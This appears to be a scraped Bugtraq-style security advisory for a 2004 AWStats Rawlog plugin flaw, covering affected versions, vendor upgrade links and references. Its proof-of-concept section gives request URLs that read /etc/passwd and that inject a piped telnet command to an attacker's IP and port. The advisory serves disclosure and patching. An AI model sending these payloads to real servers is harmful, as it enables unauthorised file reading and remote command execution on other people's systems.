AWStats Rawlog Plugin Logfile Parameter Input Validation Vulnerability
BID:10950
Info
AWStats Rawlog Plugin Logfile Parameter Input Validation Vulnerability
| Bugtraq ID: | 10950 |
| Class: | Input Validation Error |
| CVE: | |
| Remote: | Yes |
| Local: | No |
| Published: | Aug 16 2004 12:00AM |
| Updated: | Aug 16 2004 12:00AM |
| Credit: | Discovery of this vulnerability is credited to K-sPecial. |
| Vulnerable: |
AWStats AWStats 6.3 AWStats AWStats 6.2 AWStats AWStats 6.1 AWStats AWStats 6.0 AWStats AWStats 5.9 AWStats AWStats 5.8 AWStats AWStats 5.7 AWStats AWStats 5.6 AWStats AWStats 5.5 AWStats AWStats 5.4 AWStats AWStats 5.3 AWStats AWStats 5.2 AWStats AWStats 5.1 AWStats AWStats 5.0 |
| Not Vulnerable: |
AWStats AWStats 6.5.0 build 1.857 |
Discussion
AWStats Rawlog Plugin Logfile Parameter Input Validation Vulnerability
AWStats Rawlog Plugin is reported prone to an input validation vulnerability. The issue is reported to exist because user supplied 'logfile' URI data passed to the 'awstats.pl' script is not sanitized.
An attacker may exploit this condition to execute commands remotely or disclose contents of web server readable files.
It should be noted that although this vulnerability is reported to affect AWStats version 6.1, other versions might also be affected.
AWStats Rawlog Plugin is reported prone to an input validation vulnerability. The issue is reported to exist because user supplied 'logfile' URI data passed to the 'awstats.pl' script is not sanitized.
An attacker may exploit this condition to execute commands remotely or disclose contents of web server readable files.
It should be noted that although this vulnerability is reported to affect AWStats version 6.1, other versions might also be affected.
Exploit / POC
AWStats Rawlog Plugin Logfile Parameter Input Validation Vulnerability
There is no exploit required, the following example is available:
http://www.example.com/awstats.pl?filterrawlog=&rawlog_maxlines=5000&config=www.example.com&framename=main&pluginmode=rawlog&logfile=/etc/passwd
http://www.example.com/awstats.pl?filterrawlog=&rawlog_maxlines=5000&config=www.example.com&framename=main&pluginmode=rawlog&logfile=&logfile=|telnet <your ip> <port>
Where the '&config' parameter value is the configuration file for www.example.com. It is reported that the configuration filename can be harvested from the HTML source of the awstats page for the target site.
There is no exploit required, the following example is available:
http://www.example.com/awstats.pl?filterrawlog=&rawlog_maxlines=5000&config=www.example.com&framename=main&pluginmode=rawlog&logfile=/etc/passwd
http://www.example.com/awstats.pl?filterrawlog=&rawlog_maxlines=5000&config=www.example.com&framename=main&pluginmode=rawlog&logfile=&logfile=|telnet <your ip> <port>
Where the '&config' parameter value is the configuration file for www.example.com. It is reported that the configuration filename can be harvested from the HTML source of the awstats page for the target site.
Solution / Fix
AWStats Rawlog Plugin Logfile Parameter Input Validation Vulnerability
Solution:
The vendor has released AWStats 6.4 to address this issue.
AWStats AWStats 5.0
AWStats AWStats 5.1
AWStats AWStats 5.2
AWStats AWStats 5.3
AWStats AWStats 5.4
AWStats AWStats 5.5
AWStats AWStats 5.6
AWStats AWStats 5.7
AWStats AWStats 5.8
AWStats AWStats 5.9
AWStats AWStats 6.0
AWStats AWStats 6.1
AWStats AWStats 6.2
AWStats AWStats 6.3
Solution:
The vendor has released AWStats 6.4 to address this issue.
AWStats AWStats 5.0
-
AWStats awstats-6.4.tgz
http://awstats.sourceforge.net/files/awstats-6.4.tgz
AWStats AWStats 5.1
-
AWStats awstats-6.4.tgz
http://awstats.sourceforge.net/files/awstats-6.4.tgz
AWStats AWStats 5.2
-
AWStats awstats-6.4.tgz
http://awstats.sourceforge.net/files/awstats-6.4.tgz
AWStats AWStats 5.3
-
AWStats awstats-6.4.tgz
http://awstats.sourceforge.net/files/awstats-6.4.tgz
AWStats AWStats 5.4
-
AWStats awstats-6.4.tgz
http://awstats.sourceforge.net/files/awstats-6.4.tgz
AWStats AWStats 5.5
-
AWStats awstats-6.4.tgz
http://awstats.sourceforge.net/files/awstats-6.4.tgz
AWStats AWStats 5.6
-
AWStats awstats-6.4.tgz
http://awstats.sourceforge.net/files/awstats-6.4.tgz
AWStats AWStats 5.7
-
AWStats awstats-6.4.tgz
http://awstats.sourceforge.net/files/awstats-6.4.tgz
AWStats AWStats 5.8
-
AWStats awstats-6.4.tgz
http://awstats.sourceforge.net/files/awstats-6.4.tgz
AWStats AWStats 5.9
-
AWStats awstats-6.4.tgz
http://awstats.sourceforge.net/files/awstats-6.4.tgz
AWStats AWStats 6.0
-
AWStats awstats-6.4.tgz
http://awstats.sourceforge.net/files/awstats-6.4.tgz
AWStats AWStats 6.1
-
AWStats awstats-6.4.tgz
http://awstats.sourceforge.net/files/awstats-6.4.tgz
AWStats AWStats 6.2
-
AWStats awstats-6.4.tgz
http://awstats.sourceforge.net/files/awstats-6.4.tgz
AWStats AWStats 6.3
-
AWStats awstats-6.4.tgz
http://awstats.sourceforge.net/files/awstats-6.4.tgz
References
AWStats Rawlog Plugin Logfile Parameter Input Validation Vulnerability
References:
References:
- AWStats Homepage (AWStats)
- Linux.Plupii (Symantec)
- Re: AWStats <= 6.4 Multiple vulnerabilities - can't reproduce in 6.3? (K-OTiK Security
)